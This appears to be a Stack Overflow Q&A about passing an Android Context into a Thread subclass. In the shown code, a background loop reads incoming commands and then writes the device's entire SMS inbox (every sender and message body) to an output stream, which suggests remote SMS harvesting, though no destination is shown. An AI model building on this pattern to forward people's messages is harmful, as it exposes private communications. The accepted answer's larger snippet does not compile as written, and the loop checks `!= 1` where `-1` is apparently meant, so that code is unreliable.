# Passing context from class extends thread

Tags: java, android

Before, I was using `kelas1 extends Service`, and my code worked for read inbox. But I don't know how to get this to work if my class is using `kelas1 extends thread`.

```
sms.inbox(kelas1.this,localDataOutputStream);
```

And this is my code:

kelas1.java

```
public class kelas1 extends Thread {
public void run() {
    //code
    while (true) {

        charsRead = in.read(buffer);
        if (charsRead != 1) {
            String message = new String(buffer).substring(0, charsRead).replace(System.getProperty("line.separator"),"");
            Log.d("wew", message);

                // this is my problem
            sms.inbox(kelas1.this,localDataOutputStream);
    }

}
```

readsms.java

```
public class readsms {

    public void inbox(Context context, DataOutputStream outstr) throws IOException{
        Uri uriSMSURI = Uri.parse("content://sms/inbox");

          Cursor cur = context.getContentResolver().query(uriSMSURI, null, null, null,null);
          String sms = "";
          int body = cur.getColumnIndex("body");
          while (cur.moveToNext()) {
              sms += "Dari :" + cur.getString(2) + " : " + cur.getString(body);         
          }
          Log.d("wew", sms);
          sms = sms + "\nbaca sms selesai";
          outstr.writeBytes(sms);
    }
}
```

Comment: why not use a service or intent service?

Comment: you will have to pass the context to the constructor of the class kelas1 and use it there.

Comment: I just following sample code for funing in background, and the code like it. oke. i try change to service,

Comment: sorry @Raghunandan , can you give me a sample code? sorry for my bad english hehe.\

Comment: did you try getActivity() or getApplicationContext()?

Answer (score 0, accepted):

You need a context of activity class, so you need one constructor in `kelas1`

```
Context context;

public kelas1(Context context)
{
   this.context = context;
}
```

then in your code you must use this context like:

```
     sms.inbox(context,localDataOutputStream);
```

Change your code up top to something like:

```
final Context context;
public class kelas1 extends Activity {

   public kelas1(Context context)
    {
       this.context = context;
       call_thread();   
    }

public void call_thread(){
        new Thread(new Runnable(){
         public void run() {
            while (true) {
                charsRead = in.read(buffer);
                if (charsRead != 1) {
                    String message = new String(buffer).substring(0, charsRead).replace(System.getProperty("line.separator"),"");
                    Log.d("wew", message);

                    // this is my problem
                        sms.inbox(this.context,localDataOutputStream);
                }
              }
           }).start();

        }
    }
```

Comment: Hi, thanks for your reply, i have following your code, and it make another class must be change. And i have change, but still not work.
Maybe i'm wrong ??
before  :

public class servicenya extends Service{
  Thread t = new kelas1();
After :
public class servicenya extends Service{
  Thread t = new kelas1(servicenya.this);

Comment: Thanks, i will try, and i'll comment again for result. :D

Comment: Ok, remember that's only an example. All you need is the Context to make your original work. Don't forget to add kelas1  to the AndroidManifest if you change it to an Activity!

Comment: @kresekyou could use a intent service.

Comment: Hy @Petro , your first code is perfect ! Thank you very much !
And before I ever say not work, it's bacause my code wrong. And after fix my code, and i put your code, it's worked :D